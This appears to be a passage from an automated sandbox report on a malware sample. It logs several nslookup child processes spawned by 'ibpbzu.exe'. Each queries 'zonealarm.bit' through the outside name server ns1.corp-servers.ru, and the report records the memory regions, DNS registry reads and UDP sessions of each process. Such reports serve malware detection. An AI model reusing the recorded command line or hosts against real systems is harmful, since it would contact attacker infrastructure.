File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup zonealarm.bit ns1.corp-servers.ru
Initial Working Directory C:\WINDOWS\system32\
Monitor Start Time: 00:03:29, Reason: Child Process
Unmonitor End Time: 00:05:46, Reason: Terminated by Timeout
Monitor Duration 00:02:17
OS Process Information
»
Information Value
PID 0x1220
Parent PID 0x1064 (c:\users\fd1hvy\appdata\roaming\microsoft\ibpbzu.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username NQDPDE\FD1HVy
Enabled Privileges SeChangeNotifyPrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 1224
0x 1244
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000520000 0x00520000 0x0053ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000520000 0x00520000 0x0052ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000530000 0x00530000 0x00533fff Private Memory Readable, Writable True False False -
private_0x0000000000540000 0x00540000 0x00541fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000540000 0x00540000 0x00541fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000550000 0x00550000 0x00567fff Pagefile Backed Memory Readable True False False -
private_0x0000000000570000 0x00570000 0x005affff Private Memory Readable, Writable True False False -
private_0x00000000005b0000 0x005b0000 0x005effff Private Memory Readable, Writable True False False -
pagefile_0x00000000005f0000 0x005f0000 0x005f3fff Pagefile Backed Memory Readable True False False -
private_0x0000000000600000 0x00600000 0x007fffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000800000 0x00800000 0x00800fff Pagefile Backed Memory Readable True False False -
private_0x0000000000810000 0x00810000 0x00810fff Private Memory Readable, Writable True False False -
private_0x0000000000820000 0x00820000 0x0085ffff Private Memory Readable, Writable True False False -
private_0x0000000000860000 0x00860000 0x0089ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000008a0000 0x008a0000 0x008a0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000008b0000 0x008b0000 0x008b3fff Private Memory Readable, Writable True False False -
nslookup.exe 0x008d0000 0x008e6fff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x00000000008f0000 0x008f0000 0x028effff Pagefile Backed Memory - True False False -
locale.nls 0x028f0000 0x029b4fff Memory Mapped File Readable False False False -
private_0x00000000029e0000 0x029e0000 0x029effff Private Memory Readable, Writable True False False -
private_0x0000000002ac0000 0x02ac0000 0x02bbffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002bc0000 0x02bc0000 0x02cfcfff Pagefile Backed Memory Readable True False False -
private_0x0000000002d20000 0x02d20000 0x02d2ffff Private Memory Readable, Writable True False False -
wow64.dll 0x68d50000 0x68da0fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x68db0000 0x68db9fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x68dc0000 0x68e32fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x73260000 0x7326afff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x73270000 0x73282fff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x73290000 0x732a5fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x732b0000 0x732c0fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x732d0000 0x73319fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x73320000 0x73327fff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x73330000 0x733aefff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x73c10000 0x73c5dfff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x73c60000 0x73c8efff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x73ce0000 0x73cf7fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x73e10000 0x73e19fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x73e20000 0x73e3ffff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x758a0000 0x75a61fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x75a70000 0x75ad6fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75ae0000 0x75baffff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76190000 0x761d0fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76220000 0x76226fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76240000 0x762fcfff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x766b0000 0x76706fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x77030000 0x770effff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77350000 0x774ddfff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007f170000 0x7f170000 0x7f26ffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007f270000 0x7f270000 0x7f292fff Pagefile Backed Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffe0fff Private Memory Readable True False False -
private_0x000000007ffe1000 0x7ffe1000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7dfb2498ffff Private Memory Readable True False False -
pagefile_0x00007dfb24990000 0x7dfb24990000 0x7ffb2498ffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ffb24990000 0x7ffb24b6afff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ffb24b6b000 0x7ffb24b6b000 0x7ffffffeffff Private Memory Readable True False False -
Host Behavior
Registry (7)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient - False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DNSLookupOrder False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = Domain True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpDomain False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = SearchList False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpSearchList False 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\nslookup.exe base_address = 0x8d0000 True 1
Fn
Network Behavior
DNS (2)
»
Operation Additional Information Success Count Logfile
Get Hostname name_out = NQdPdE True 1
Fn
Resolve Name host = ns1.corp-servers.ru, address_out = 189.75.183.21, 94.183.71.48, 89.203.10.56, 94.249.60.127 True 1
Fn
UDP Sessions (3)
»
Information Value
Total Data Sent 106 bytes
Total Data Received 772 bytes
Contacted Host Count 1
Contacted Hosts 189.75.183.21:53
UDP Session #1
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 189.75.183.21
Remote Port 53
Local Address -
Local Port -
Data Sent 44 bytes
Data Received 0 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 189.75.183.21, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 44, size_out = 44 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #2
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 189.75.183.21
Remote Port 53
Local Address -
Local Port -
Data Sent 31 bytes
Data Received 191 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 189.75.183.21, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 31, size_out = 31 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 191 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #3
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 189.75.183.21
Remote Port 53
Local Address -
Local Port -
Data Sent 31 bytes
Data Received 581 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 189.75.183.21, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 31, size_out = 31 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 581 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
Process #16: nslookup.exe
8 16
»
Information Value
ID #16
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup zonealarm.bit ns1.corp-servers.ru
Initial Working Directory C:\WINDOWS\system32\
Monitor Start Time: 00:03:43, Reason: Child Process
Unmonitor End Time: 00:05:46, Reason: Terminated by Timeout
Monitor Duration 00:02:03
OS Process Information
»
Information Value
PID 0x124c
Parent PID 0x1064 (c:\users\fd1hvy\appdata\roaming\microsoft\ibpbzu.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username NQDPDE\FD1HVy
Enabled Privileges SeChangeNotifyPrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 1250
0x 126C
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000570000 0x00570000 0x0058ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000570000 0x00570000 0x0057ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000580000 0x00580000 0x00583fff Private Memory Readable, Writable True False False -
private_0x0000000000590000 0x00590000 0x00591fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000590000 0x00590000 0x00591fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000005a0000 0x005a0000 0x005b7fff Pagefile Backed Memory Readable True False False -
private_0x00000000005c0000 0x005c0000 0x005fffff Private Memory Readable, Writable True False False -
private_0x0000000000600000 0x00600000 0x007fffff Private Memory Readable, Writable True False False -
private_0x0000000000800000 0x00800000 0x0083ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000840000 0x00840000 0x00843fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000850000 0x00850000 0x00850fff Pagefile Backed Memory Readable True False False -
private_0x0000000000860000 0x00860000 0x00860fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000870000 0x00870000 0x00870fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000880000 0x00880000 0x0088ffff Private Memory Readable, Writable True False False -
private_0x0000000000890000 0x00890000 0x008cffff Private Memory Readable, Writable True False False -
nslookup.exe 0x008d0000 0x008e6fff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x00000000008f0000 0x008f0000 0x028effff Pagefile Backed Memory - True False False -
private_0x00000000028f0000 0x028f0000 0x028f3fff Private Memory Readable, Writable True False False -
private_0x0000000002900000 0x02900000 0x029fffff Private Memory Readable, Writable True False False -
locale.nls 0x02a00000 0x02ac4fff Memory Mapped File Readable False False False -
private_0x0000000002ad0000 0x02ad0000 0x02b0ffff Private Memory Readable, Writable True False False -
private_0x0000000002b60000 0x02b60000 0x02b6ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002b70000 0x02b70000 0x02cacfff Pagefile Backed Memory Readable True False False -
wow64.dll 0x68d50000 0x68da0fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x68db0000 0x68db9fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x68dc0000 0x68e32fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x73260000 0x7326afff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x73270000 0x73282fff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x73290000 0x732a5fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x732b0000 0x732c0fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x732d0000 0x73319fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x73320000 0x73327fff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x73330000 0x733aefff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x73c10000 0x73c5dfff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x73c60000 0x73c8efff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x73ce0000 0x73cf7fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x73e10000 0x73e19fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x73e20000 0x73e3ffff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x758a0000 0x75a61fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x75a70000 0x75ad6fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75ae0000 0x75baffff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76190000 0x761d0fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76220000 0x76226fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76240000 0x762fcfff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x766b0000 0x76706fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x77030000 0x770effff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77350000 0x774ddfff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007fd00000 0x7fd00000 0x7fdfffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007fe00000 0x7fe00000 0x7fe22fff Pagefile Backed Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffe0fff Private Memory Readable True False False -
private_0x000000007ffe1000 0x7ffe1000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7dfb2498ffff Private Memory Readable True False False -
pagefile_0x00007dfb24990000 0x7dfb24990000 0x7ffb2498ffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ffb24990000 0x7ffb24b6afff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ffb24b6b000 0x7ffb24b6b000 0x7ffffffeffff Private Memory Readable True False False -
Host Behavior
Registry (7)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient - False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DNSLookupOrder False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = Domain True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpDomain False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = SearchList False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpSearchList False 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\nslookup.exe base_address = 0x8d0000 True 1
Fn
Network Behavior
DNS (2)
»
Operation Additional Information Success Count Logfile
Get Hostname name_out = NQdPdE True 1
Fn
Resolve Name host = ns1.corp-servers.ru, address_out = 189.75.183.21, 94.183.71.48, 89.203.10.56, 94.249.60.127 True 1
Fn
UDP Sessions (3)
»
Information Value
Total Data Sent 106 bytes
Total Data Received 772 bytes
Contacted Host Count 1
Contacted Hosts 189.75.183.21:53
UDP Session #1
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 189.75.183.21
Remote Port 53
Local Address -
Local Port -
Data Sent 44 bytes
Data Received 0 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 189.75.183.21, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 44, size_out = 44 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #2
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 189.75.183.21
Remote Port 53
Local Address -
Local Port -
Data Sent 31 bytes
Data Received 191 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 189.75.183.21, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 31, size_out = 31 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 191 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #3
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 189.75.183.21
Remote Port 53
Local Address -
Local Port -
Data Sent 31 bytes
Data Received 581 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 189.75.183.21, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 31, size_out = 31 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 581 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
Process #18: nslookup.exe
8 16
»
Information Value
ID #18
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup zonealarm.bit ns1.corp-servers.ru
Initial Working Directory C:\WINDOWS\system32\
Monitor Start Time: 00:04:18, Reason: Child Process
Unmonitor End Time: 00:05:46, Reason: Terminated by Timeout
Monitor Duration 00:01:28
OS Process Information
»
Information Value
PID 0x135c
Parent PID 0x1064 (c:\users\fd1hvy\appdata\roaming\microsoft\ibpbzu.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username NQDPDE\FD1HVy
Enabled Privileges SeChangeNotifyPrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 1360
0x 1380
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x00000000006b0000 0x006b0000 0x006cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000006b0000 0x006b0000 0x006bffff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000006c0000 0x006c0000 0x006c3fff Private Memory Readable, Writable True False False -
private_0x00000000006d0000 0x006d0000 0x006d1fff Private Memory Readable, Writable True False False -
pagefile_0x00000000006d0000 0x006d0000 0x006d1fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000006e0000 0x006e0000 0x006f7fff Pagefile Backed Memory Readable True False False -
private_0x0000000000700000 0x00700000 0x0073ffff Private Memory Readable, Writable True False False -
private_0x0000000000740000 0x00740000 0x0077ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000780000 0x00780000 0x00783fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000790000 0x00790000 0x00790fff Pagefile Backed Memory Readable True False False -
private_0x00000000007a0000 0x007a0000 0x007a0fff Private Memory Readable, Writable True False False -
private_0x00000000007b0000 0x007b0000 0x007effff Private Memory Readable, Writable True False False -
private_0x00000000007f0000 0x007f0000 0x0082ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000830000 0x00830000 0x00830fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000840000 0x00840000 0x00843fff Private Memory Readable, Writable True False False -
private_0x0000000000860000 0x00860000 0x0086ffff Private Memory Readable, Writable True False False -
nslookup.exe 0x008d0000 0x008e6fff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x00000000008f0000 0x008f0000 0x028effff Pagefile Backed Memory - True False False -
locale.nls 0x028f0000 0x029b4fff Memory Mapped File Readable False False False -
private_0x0000000002a00000 0x02a00000 0x02bfffff Private Memory Readable, Writable True False False -
private_0x0000000002c50000 0x02c50000 0x02d4ffff Private Memory Readable, Writable True False False -
private_0x0000000002de0000 0x02de0000 0x02deffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002df0000 0x02df0000 0x02f2cfff Pagefile Backed Memory Readable True False False -
wow64.dll 0x68d50000 0x68da0fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x68db0000 0x68db9fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x68dc0000 0x68e32fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x73260000 0x7326afff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x73270000 0x73282fff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x73290000 0x732a5fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x732b0000 0x732c0fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x732d0000 0x73319fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x73320000 0x73327fff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x73330000 0x733aefff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x73c10000 0x73c5dfff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x73c60000 0x73c8efff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x73ce0000 0x73cf7fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x73e10000 0x73e19fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x73e20000 0x73e3ffff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x758a0000 0x75a61fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x75a70000 0x75ad6fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75ae0000 0x75baffff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76190000 0x761d0fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76220000 0x76226fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76240000 0x762fcfff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x766b0000 0x76706fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x77030000 0x770effff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77350000 0x774ddfff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007e660000 0x7e660000 0x7e75ffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007e760000 0x7e760000 0x7e782fff Pagefile Backed Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffe0fff Private Memory Readable True False False -
private_0x000000007ffe1000 0x7ffe1000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7dfb2498ffff Private Memory Readable True False False -
pagefile_0x00007dfb24990000 0x7dfb24990000 0x7ffb2498ffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ffb24990000 0x7ffb24b6afff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ffb24b6b000 0x7ffb24b6b000 0x7ffffffeffff Private Memory Readable True False False -
Host Behavior
Registry (7)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient - False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DNSLookupOrder False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = Domain True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpDomain False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = SearchList False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpSearchList False 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\nslookup.exe base_address = 0x8d0000 True 1
Fn
Network Behavior
DNS (2)
»
Operation Additional Information Success Count Logfile
Get Hostname name_out = NQdPdE True 1
Fn
Resolve Name host = ns1.corp-servers.ru, address_out = 189.75.183.21, 94.183.71.48, 89.203.10.56, 94.249.60.127 True 1
Fn
UDP Sessions (3)
»
Information Value
Total Data Sent 106 bytes
Total Data Received 772 bytes
Contacted Host Count 1
Contacted Hosts 189.75.183.21:53
UDP Session #1
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 189.75.183.21
Remote Port 53
Local Address -
Local Port -
Data Sent 44 bytes
Data Received 0 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 189.75.183.21, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 44, size_out = 44 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #2
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 189.75.183.21
Remote Port 53
Local Address -
Local Port -
Data Sent 31 bytes
Data Received 191 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 189.75.183.21, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 31, size_out = 31 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 191 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #3
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 189.75.183.21
Remote Port 53
Local Address -
Local Port -
Data Sent 31 bytes
Data Received 581 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 189.75.183.21, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 31, size_out = 31 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 581 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
Process #20: nslookup.exe
8 16
»
Information Value
ID #20
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup zonealarm.bit ns1.corp-servers.ru
Initial Working Directory C:\WINDOWS\system32\
Monitor Start Time: 00:04:31, Reason: Child Process
Unmonitor End Time: 00:05:46, Reason: Terminated by Timeout
Monitor Duration 00:01:15
OS Process Information
»
Information Value
PID 0x1068
Parent PID 0x1064 (c:\users\fd1hvy\appdata\roaming\microsoft\ibpbzu.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username NQDPDE\FD1HVy
Enabled Privileges SeChangeNotifyPrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 10C4
0x D00
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00023fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00031fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000050000 0x00050000 0x00053fff Private Memory Readable, Writable True False False -
private_0x0000000000080000 0x00080000 0x0017ffff Private Memory Readable, Writable True False False -
locale.nls 0x00180000 0x00244fff Memory Mapped File Readable False False False -
private_0x0000000000380000 0x00380000 0x0038ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000390000 0x00390000 0x004ccfff Pagefile Backed Memory Readable True False False -
private_0x00000000007c0000 0x007c0000 0x007dffff Private Memory Readable, Writable True False False -
private_0x00000000007e0000 0x007e0000 0x007e1fff Private Memory Readable, Writable True False False -
pagefile_0x00000000007f0000 0x007f0000 0x00807fff Pagefile Backed Memory Readable True False False -
private_0x0000000000810000 0x00810000 0x0084ffff Private Memory Readable, Writable True False False -
private_0x0000000000850000 0x00850000 0x0088ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000890000 0x00890000 0x00893fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000008a0000 0x008a0000 0x008a0fff Pagefile Backed Memory Readable True False False -
private_0x00000000008b0000 0x008b0000 0x008b0fff Private Memory Readable, Writable True False False -
nslookup.exe 0x008d0000 0x008e6fff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x00000000008f0000 0x008f0000 0x028effff Pagefile Backed Memory - True False False -
private_0x00000000028f0000 0x028f0000 0x0292ffff Private Memory Readable, Writable True False False -
private_0x0000000002930000 0x02930000 0x0296ffff Private Memory Readable, Writable True False False -
private_0x0000000002990000 0x02990000 0x0299ffff Private Memory Readable, Writable True False False -
private_0x0000000002a00000 0x02a00000 0x02bfffff Private Memory Readable, Writable True False False -
wow64.dll 0x68d50000 0x68da0fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x68db0000 0x68db9fff Memory Mapped File Readable, Writable, Executable False False False -
